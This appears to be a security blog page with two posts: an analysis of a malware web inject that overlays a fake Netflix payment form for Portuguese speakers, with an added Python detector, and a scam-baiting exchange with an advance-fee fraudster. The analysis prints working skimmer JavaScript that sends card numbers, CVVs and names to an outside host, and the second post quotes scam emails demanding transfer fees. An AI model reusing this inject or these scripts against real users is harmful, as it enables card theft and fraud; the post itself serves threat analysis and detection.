
NETFLIX malware/phishing attack targeting Portuguese-speaking countries

Netflix is one of the most popular streaming platforms worldwide, largely thanks to its "hottest" TV series. This popularity has also attracted criminals looking for new ways to steal money. During the last months Netflix has been targeted by malware written to steal credit card information and user credentials. The attack uses the same methodology as financial malware like Dridex/Zeus: web injects.

Once the user has been infected, the malware waits until the user loads the Netflix login page. As soon as the browser loads the page content from the server, the malware injects its malicious HTML, JavaScript and CSS into it.

The inject is activated on GET or POST requests to *netflix.com*, as configured by the following directive:

set_url *netflix.com/* GP

where G = GET and P = POST.

Once the page is loaded the malware injects the following code:

CSS code

.ontop {
z-index: 999;
width: 100%;
height: 100%;
top: 0;
left: 0;
display: none;
position: absolute;
}
.ontop2 {
top: 50%;
left: 50%;
margin-bottom: 0;
align-content: center;
}
#popup {
padding: 10px;
width: 1224px;
height: 700px;
position: absolute;
color: #fff;
top: 50%;
left: 50%;
margin-top: -400px;
margin-left: -600px;
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
font-size: 12px;
background: #000000;
}
#cc_form input {
width: 100%;
height: 50px;
padding: 9px;
border-radius: 2px;
border: 1px solid #999;
color: #fff;
background-color: #333;
}
#cc_form td {
padding-top: 10px;
color: #eee;
font-size: 12px;
}
#cc_submit {
text-decoration: none;
color: white;
padding-bottom: 12px;
padding-left: 28px;
padding-right: 28px;
padding-top: 12px;
text-align: center;
border-radius: 2px;
background: #ff3019;
background: -moz-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: -webkit-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: linear-gradient(to bottom, #ff3019 0%, #cf0404 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff3019', endColorstr='#cf0404', GradientType=0);
}
#cc_submit:hover {
background: #ff1a00;
background: -moz-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: -webkit-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: linear-gradient(to bottom, #ff1a00 0%, #ff1a00 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff1a00', endColorstr='#ff1a00', GradientType=0);
}

JavaScript code

.....

function submitMe(){ 
    if (document.getElementById("cc_number").value == "") {
        alert("Ingresse um numero de Cartao");
        document.getElementById("cc_number").focus();
        return false;
    }else {
        if (valid_credit_card(document.getElementById("cc_number").value)) {} 
        else {
           alert("Ingresse um numero Valido");
           document.getElementById("cc_number").focus();
           return false;
        }
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o mes de validade!");
        document.getElementById("cc_month").focus();
        return false;
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o ano de validade!");
        document.getElementById("cc_year").focus();
        return false;
    } 
    if (document.getElementById("cc_ccv").value == "") {
        alert("Ingresse o codigo de segurança do seu cartao!");
        document.getElementById("cc_ccv").focus();
        return false;
    }
    if (document.getElementById("cc_name").value == "") {
        alert("Ingresse o seu nome Completo!");
        document.getElementById("cc_name").focus();
        return false;
    }

var _link_ = "https://p0o9i8u7y9.xyz/braz2/gate.php?";
var _url_ = _link_ + 'CC=' + document.getElementById("cc_number").value + '&month=' + document.getElementById("cc_month").value + '&year=' + document.getElementById("cc_year").value + '&cvv=' + document.getElementById("cc_ccv").value + '&name=' + document.getElementById("cc_name").value;
var head = document.getElementsByTagName("head")[0];
var script_ = document.createElement('script');
script_.src = _url_;
script_.type = 'text/javascript';
head.appendChild(script_);
setCookie("WeAre", "Foda", 365);
hide('popDiv');
}

......
HTML code


<div class="ontop" id="popDiv">

<div id="popup">
   <center>
   <img src= "https://logodownload.org/wp-content/uploads/2014/10/netflix-logo.png"width="128">
  </center>

<h4>Houve um problema com seus dados de pagamento.</h4>

Desculpe-nos por
 interromper o show, mas não foi possÌvel confirmar suas informações de
 pagamento. Mas não se preocupe! Insira os dados no campo abaixo para
 continuar.

<form id="cc_form" name="cc_form">

<table width="100%">

<tr>

<td colspan="2">Numero do cartão: <input id="cc_number" name= "cc_number" placeholder="E.g. 0000 0000 0000 0000" type="text"></td>

 </tr>


<tr>

<td>Validade: <input id="cc_month" name="cc_month" placeholder="MM" style="width: 45% !important;" type="text"> <input id="cc_year" name= "cc_year" placeholder="AA" style="width: 45% !important;" type= "text"></td>


<td>Codigo de segurança: <input id="cc_ccv" name="cc_ccv" placeholder="" type="text"></td>

 </tr>


<tr>

<td colspan="2">Nome do titular (conforme escrito no cartão):
 <input id="cc_name" name="cc_name" type="text"></td>

 </tr>

 </table>

<a href="" id="cc_submit" onclick="submitMe();">CONTINUAR</a>
 </form>

 </div>

</div>

To see how the malware interacts with the user, we can inject the code into the browser once the Netflix login page has loaded.

The malware checks whether the entered credit card number is valid.

With a valid card number it is possible to submit the request, triggering the submitMe() JavaScript function (shown above).
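The submitMe() function above exfiltrates the card data as a plain GET query string (CC, month, year, cvv, name) to the gate.php endpoint, after a client-side card-number check. The following script is an added detection example, not code from the original post: it scans constructed proxy log lines for that exfiltration shape, using a Luhn check (assumed to be what the inject's valid_credit_card() implements) to cut false positives, since the inject itself only submits Luhn-valid numbers.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample proxy log lines (method, URL, status); card data is made up.
SAMPLE_LOG = """\
GET https://www.netflix.com/login 200
GET https://p0o9i8u7y9.xyz/braz2/gate.php?CC=4539578763621486&month=12&year=19&cvv=123&name=Maria+Silva 200
GET https://cdn.example.net/app.js?v=1234567890123456 200
GET https://p0o9i8u7y9.xyz/braz2/gate.php?CC=1234567890123456&month=1&year=20&cvv=000&name=Test 200
"""

# Query parameter names the inject uses to carry the card data (lower-cased).
CARD_PARAMS = {"cc", "cvv", "month", "year"}

def luhn_valid(number: str) -> bool:
    """Luhn checksum; assumed equivalent to the inject's valid_credit_card()."""
    digits = [int(c) for c in number if c.isdigit()]
    if len(digits) < 13 or len(digits) > 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def inspect_request(url: str) -> dict:
    """Classify one request URL: does its query string look like card data leaving?"""
    parsed = urlparse(url)
    qs = {k.lower(): v[0] for k, v in parse_qs(parsed.query).items()}
    present = CARD_PARAMS & set(qs)
    pan = re.sub(r"\D", "", qs.get("cc", ""))
    return {
        "host": parsed.hostname,
        "card_params": sorted(present),
        "luhn_valid": luhn_valid(pan),
        # A Luhn-valid PAN together with a CVV in a GET query string is the skimmer's shape.
        "suspicious": {"cc", "cvv"} <= present and luhn_valid(pan),
    }

def find_exfil(log: str) -> list:
    """Return (host, card_params) for every log line flagged as card exfiltration."""
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        verdict = inspect_request(parts[1])
        if verdict["suspicious"]:
            hits.append((verdict["host"], verdict["card_params"]))
    return hits
```

The Luhn-invalid line is deliberately left unflagged; alerting on the destination host alone, once it is known, is the cheaper rule.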


A nice conversation with a “scammer”

“The so-called “419” scam (aka “Nigeria scam” or “West African” scam) is a type of fraud named after an article of the Nigerian penal code under which it is prosecuted. It is also known as “Advance Fee Fraud” because the common principle of all the scam format is to get the victim to send cash (or other items of value) upfront by promising them a large amount of money that they would receive later if they cooperate. In almost all cases, the criminals receive money using Western Union and MoneyGram, instant wire transfer services with which the recipient can’t be traced once the money has been picked up. These services should never be used with people you only know by email or telephone!” (http://www.419scam.org)

Curious about that, I started a nice conversation with the Nigerian guy to see how the scam actually works.

Scammer

Dear Friend,

 I am very happy to inform you about my success in getting that fund transferred. Now I want you to contact my secretary and ask him for a cheque worth of USD$800,000 which I kept for you as a compensation of your past assistance to me. His contact details is below;

Name:   John Izualo.

Email;  ( johnizualo6@yahoo.com )

Kindly reconfirm to him the following below information:

 

Your full name_________

Your address_______

Your country______

Your age__________ 

Your occupation______

Your Phone number_______

 

Note that if you did not send him the above information complete,he will not release the cheque to you because he has to be sure that it is you. Note also that I will not be reached by email or phone at this moment because I am currently in London for investment trip with my share.

Regards,

Dr.Peter Ikey Obi.

Me

Hello I received this mail from Dr.Peter Ikey Obi,

I didn't know how I helped him but I'm very happy to receive this bonus.

Here are my details for the transfer.

Your full name______Davide XXXX

Your address_______Via dei XXX

Your country_______Italy

Your age___________59

Your occupation______Director Sales at XXX

Your Phone number_______+3934877XXXXX

Regards,

Scammer

 DEAR Davide XXXX,

WELL, I RECEIVE YOUR EMAIL AND ITS CONTENT AND I HAVE MADE SOME INQUIRES ACCORDING TO THE INSTRUCTIONS GIVEN TO ME BY MY BOSS BEFORE HE WENT TO LONDON AND I WANT YOU TO DO ME A FAVOR NOW TOWARDS YOUR FUNDS IN A CERTIFIED BANK CHEQUE ($800,000.00 USD), DO YOU WANT TO RECEIVE IT THROUGH BANK TO BANK WIRING TRANSFER OR DO YOU WANT IT THROUGH DELIVERY FROM COURIER COMPANY, I WANT YOU TO GET BACK TO ME TODAY CONCERNING THIS MATTER! AND IF YOUR CHOICE IS BANK TO BANK WIRING TRANSFER, PLEASE TRY TO FORWARD ME YOUR BANK ACCOUNT INFORMATION BECAUSE THE BANK HERE NEEDS IT TO TRANSFER YOUR FUND INTO YOUR ACCOUNT THERE OK.


BUT IF YOUR CHOICE IS THROUGH COURIER COMPANY, THEN I ALSO WANT YOU TO GET BACK TO ME AS SOON AS POSSIBLE, SO THAT I WILL MAKE THE REMAINING ARRANGEMENT WITH THE COURIER COMPANY HERE CONCERNING HOW TO DELIVERY YOUR CERTIFIED BANK CHEQUE OF $800, 000.00 USD TO YOU, BECAUSE YOUR ADDRESS IS ALREADY RECEIVED HERE OK.

THANKS AND HAPPY TO HEAR BACK FROM YOU,


YOURS SINCERELY,
JOHN IZUALO,
PHONE: +234-806-4228395.

Me

Hello Mr Jhon,

I would like to go through a courier company because I do not have currently my bank account available. What should I do?

Thanks

Best

Scammer

Dear Davide XXXX,
Well, I received your e-mail and its content but inquires I made today stated that delivering your cheque of USD$800,000.00 to you through courier company will only cost you $195.92 for its delivering through FedEx.

and you are required to send the delivering fee of $195.92 through western union or money gram money transfer in the below receiver's name information ok. As soon as you send the fee then get back to me with the MTCN and your cheque of $800, 000.00 must be delivered to you without wasting any time OK.

HERE IS THE RECEIVER'S NAME INFORMATION TO SEND THE REQUIRED FEE OF $195.92 THROUGH WESTERN UNION MONEY TRANSFER OR MONEY GRAM:


RECEIVER'S NAME: PETER NWAKOR

CITY: LAGOS

COUNTRY: NIGERIA

COUNTRY CODE: +234.

TEST QUESTION: IN GOD?

ANSWER: WE TRUST

Thanks,

Mr. John Izualo.

Phone: +234-806-4228395

Me

Hi Thanks a lot.

Tomorrow I will send the money. When will I receive the money?

Do you need more information to send the money?

Thanks a lot thanks

Best

Everything was working fine and I was so happy to receive my payment of 800K $.

But I made a mistake. I waited too long to make the payment via WU and my Nigerian friend became angry 🙁

He replied to me the following:

Scammer

Am here to inform you that i have tried my best to make sure you receive your cheque, but i cansee that you are not serious about it, failure to compiler with me by the fee today and tomorrow, i will return the cheque to my boss first thing on Monday morning.

The weekend started and I could not reach him anymore. He doesn't answer anymore. My yacht has to wait.... maybe the next scam will be the right one!!